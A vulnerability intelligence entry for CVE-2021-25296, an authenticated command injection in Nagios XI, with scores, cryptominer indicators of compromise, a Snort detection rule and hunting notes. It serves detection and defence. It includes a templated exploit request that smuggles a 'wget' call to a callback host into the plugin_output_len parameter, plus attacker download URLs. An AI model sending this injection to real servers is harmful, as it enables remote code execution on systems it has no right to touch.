CVE-2021-25296
published 2021-02-15


Priority: P1, 92, high
CVSS 3.1: 8.8 (AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H)
Tags: KEV, ITW, EXPLOIT
CISA Known Exploited Vulnerability, due 2022-02-01
Exploited in the wild
EPSS: 71.74% (99.3rd percentile)
Nagios XI version xi-5.7.5 is affected by OS command injection. The vulnerability exists in the file /usr/local/nagiosxi/html/includes/configwizards/windowswmi/windowswmi.inc.php due to improper sanitization of authenticated user-controlled input by a single HTTP request, which can lead to OS command injection on the Nagios XI server.

Affected (1 range)

Vendor: nagios
Product: nagios_xi
Version range: 5.5.6 – 5.7.5
Fixed in: (not listed)

Detection & IOCs (extracted from sources)

ip: 118.107.43.174
url: http://118.107.43.174/upload/files/xmrig
url: http://118.107.43.174/upload/files/config.json
url: http://118.107.43.174/upload/files/run.sh
url: http://118.107.43.174/upload/files/xmrig.tar.gz
hash: 54b45e93cee8f08a97b86afa78a78bc070b6167dcc6cdc735bd167af076cb5b3
hash: 2c923d8b553bde8ce3167fe83f35a40a712e2bed2b76ebaf5e3e63642d551389
hash: c711bb6cf918b1f140f4162daab37844656eba2e16c25c429606e4c69c990f99
hash: 4079b3b34caa86dce0edc923a3292f5814dd555f28e8e6ec4c879a2c50a80787
path: /usr/local/nagiosxi/html/includes/configwizards/windowswmi/windowswmi.inc.php
path: /usr/lib/dev
path: /tmp/usr/lib
filename: workrun.sh
filename: systemd-udevd.sh
filename: systemd-udevd-run.sh
filename: systemd-run.py
filename: systemd-py-run.sh
filename: xmrig.tar.gz
url: /nagiosxi/config/monitoringwizard.php?update=1&nsp={{nsp}}&nextstep=3&wizard=windowswmi&check_wmic_plus_ver=1.65&ip_address=127.0.0.1&domain=127.0.0.1&username=username&password=password&plugin_output_len=9999%3bwget%20{{interactsh-url}}%3b

snort:
alert http any any -> [$HOME_NET,$HTTP_SERVERS] any (msg:"ET EXPLOIT Nagios XI OS Command Injection (CVE-2021-25296)"; flow:established,to_server; http.method; content:"GET"; http.uri; content:"nagiosxi/config/monitoringwizard.php?"; fast_pattern; content:"plugin_output_len="; pcre:"/^[0-9]{1,10}\x3b/R"; reference:cve,2021-25296; classtype:attempted-admin; sid:2034992; rev:1; metadata:attack_target Server, created_at 2022_01_27, cve CVE_2021_25296, deployment Perimeter, deployment Internal, confidence Medium, signature_severity Major, tag Exploit, tag CISA_KEV, updated_at 2022_01_27, mitre_tactic_id TA0001, mitre_tactic_name Initial_Access, mitre_technique_id T1190, mitre_technique_name Exploit_Public_Facing_Application;)
  • Exploit targets GET /nagiosxi/config/monitoringwizard.php with wizard=windowswmi and a semicolon-injected plugin_output_len parameter (e.g., plugin_output_len=9999;<command>). Monitor for a numeric value followed immediately by %3b or a literal semicolon in that parameter.
  • Hunt for running processes matching systemd-py-run.sh, systemd-run.py, systemd-udevd-run.sh, systemd-udevd.sh, workrun.sh, or systemd-dev as indicators of XMRig deployment post-exploitation.
  • Check for the presence of dropper/persistence scripts in /usr/lib/dev and /tmp/usr/lib as post-exploitation artifacts.
  • Palo Alto Threat Prevention signature 90873 covers this exploit; use it as a reference SID for tuning equivalent IDS/IPS rules.
  • Emerging Threats Snort/Suricata SID 2034992 directly detects CVE-2021-25296 exploitation attempts against nagiosxi/config/monitoringwizard.php with a semicolon-injected plugin_output_len value.
  • Exploitation requires valid Nagios XI credentials; this is an authenticated RCE, not an unauthenticated one. Detection rules should account for the authenticated session flow (login → obtain nsp token → exploit request).
  • The vulnerable backend file /html/config/monitoringwizard.php is encrypted with SG11; analysis must be performed on the include file windowswmi.inc.php instead.
  • The same Metasploit module also covers CVE-2021-25297 (switch wizard) and CVE-2021-25298 (cloud-vm wizard); detections scoped only to windowswmi will miss those related exploitation paths.

CVSS provenance

nvd v3.1: 8.8 HIGH (CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H)
nvd v2.0: 9.0 CRITICAL (AV:N/AC:L/Au:S/C:C/I:C/A:C)
vulncheck: 8.8 HIGH
cisa: 8.8 HIGH